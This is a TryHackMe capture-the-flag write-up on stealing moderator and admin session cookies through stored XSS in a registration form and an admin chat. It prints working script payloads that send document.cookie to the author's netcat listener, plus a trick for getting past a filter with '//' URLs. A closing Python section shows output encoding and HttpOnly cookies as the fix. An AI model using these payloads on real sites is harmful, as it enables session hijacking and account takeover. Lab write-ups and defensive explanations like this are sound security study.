TryHackMe - Whats Your Name? writeup

Published on by logoseq

Walkthrough

Summary:

In this challenge I managed to get the moderator's and admin's cookies via XSS/CSRF. I added the worldwap.thm domain to our /etc/hosts file and injected the XSS payload into the name form and into the admin's chat.

Foothold:

I added worldwap.thm to the '/etc/hosts' file as specified in the description, then did a fast nmap scan:
logoseq@kali$ nmap -sC -sV -v -oN nmap_initial -T 3 worldwap.thm
  22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu
    |_Requested resource was /public/html/
  80/tcp   open  http    Apache httpd 2.4.41
  8081/tcp open  http    Apache httpd 2.4.41

I opened the web page and found a registration page; I filled in the form and submitted it:

Registration form

After the registration I was sent to http://worldwap.thm/public/html/login.php, where there was a message saying that a subdomain was present: login.worldwap.thm. I added it to the /etc/hosts file.

/login.php page, where a subdomain is written: login.worldwap.thm

I opened it and it was the same page as the one found running on port 8081.

Exploitation:

I tried sending some XSS (cross-site scripting) payloads and found a working one in the #name field of http://worldwap.thm/public/html/register.php.

    # my machine (tun0 IP: 10.11.12.13)
    logoseq@kali:$ nc -lvnp 4444

    # payload to be sent in html form into 'name' parameter
    <script>var i=new Image(); i.src="http://10.11.12.13:4444/?cookie="+document.cookie;</script>
moderator's cookie in netcat response

I opened the Chrome dev tools and changed my cookie to the moderator's cookie, then opened "/dashboard.php", which I had found earlier via content discovery, but the only feature available there was disabled. Then I decided to go to login.worldwap.thm and use the same cookie; I refreshed the page and got the flag from "/profile.php".

moderator's login.worldwap.thm/profile.php page, there is the first flag

Then I went to the "Go to Chat" page ( /chat.php ) and found that I could chat with the admin. I tried to send the same XSS payload (changing only the port to 4446), but it didn't work: there was a WAF or something else that added " <a href= ", probably because of the "http://" in the payload.

testing for XSS payloads in the /chat.php while chatting with admin

I asked ChatGPT for an alternative and found that "http://" can be replaced with "//", and now it worked!

  # payload to be sent as POST request in html form '/chat.php' into 'message' parameter
  <script>var i=new Image(); i.src="//10.14.65.0:4446/?cookie="+document.cookie;</script>
XSS payload worked in the chat with admin

I got a new request to my netcat listener on port 4446, but it was my own cookie because the page had reloaded. I closed the netcat listener and opened it again, and after a few seconds I received the admin's cookie.
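For the defensive side of what happened here: the chat filter only rewrote "http://" into a link, which is why the "//" variant got through. What would have stopped both payloads is encoding user input on output and marking the session cookie HttpOnly. The following Python is an added example and not code from the original writeup or the room; the cookie name PHPSESSID and the ATTACKER host are assumed placeholders, and the sample messages are constructed.

```python
import html
import re

# Constructed sample inputs: the two payload shapes from the writeup (absolute
# URL, then the protocol-relative "//" variant that got past the filter) and a
# harmless chat line. ATTACKER is a placeholder host, not a real address.
SAMPLE_MESSAGES = [
    '<script>var i=new Image(); i.src="http://ATTACKER:4444/?cookie="+document.cookie;</script>',
    '<script>var i=new Image(); i.src="//ATTACKER:4446/?cookie="+document.cookie;</script>',
    "hello, is anyone there?",
]


def linkify_only(message: str) -> str:
    """The weak approach implied by the writeup: wrap http:// URLs in <a href>
    and otherwise echo the raw text. The <script> element survives untouched,
    and a "//" URL is not even rewritten."""
    return re.sub(r"(http://\S+)", r'<a href="\1">\1</a>', message)


def render_message(message: str) -> str:
    """Hardened rendering: HTML-encode everything the user supplied before it
    goes into the page body. The browser then sees text, not a <script>
    element, regardless of whether the URL inside is http:// or //."""
    return html.escape(message, quote=True)


def contains_script_element(rendered: str) -> bool:
    """Check a rendered fragment for an executable script tag."""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None


def session_cookie_header(value: str) -> str:
    """Set-Cookie value with HttpOnly so document.cookie cannot read the session
    id even if markup injection does occur; Secure and SameSite for good measure.
    PHPSESSID is an assumed cookie name for the PHP app in the writeup."""
    return f"PHPSESSID={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


def document_cookie_view(set_cookie: str) -> str:
    """Model what document.cookie would expose for this cookie: HttpOnly cookies
    are invisible to script, so a cookie-exfiltration payload reads nothing."""
    if "httponly" in set_cookie.lower():
        return ""
    return set_cookie.split(";", 1)[0]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("linkify keeps <script>:", contains_script_element(linkify_only(msg)))
        print("escape keeps <script>:  ", contains_script_element(render_message(msg)))
    print("script sees:", repr(document_cookie_view(session_cookie_header("abc123"))))
```

The two controls are independent: output encoding stops the injection itself, and HttpOnly limits the damage of any injection the encoding misses.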

netcat request from victim's machine, there is the admin's cookie in the request

I changed the cookie again and went to the /profile.php page, where the admin's flag was.

/profile.php page with admin's flag
...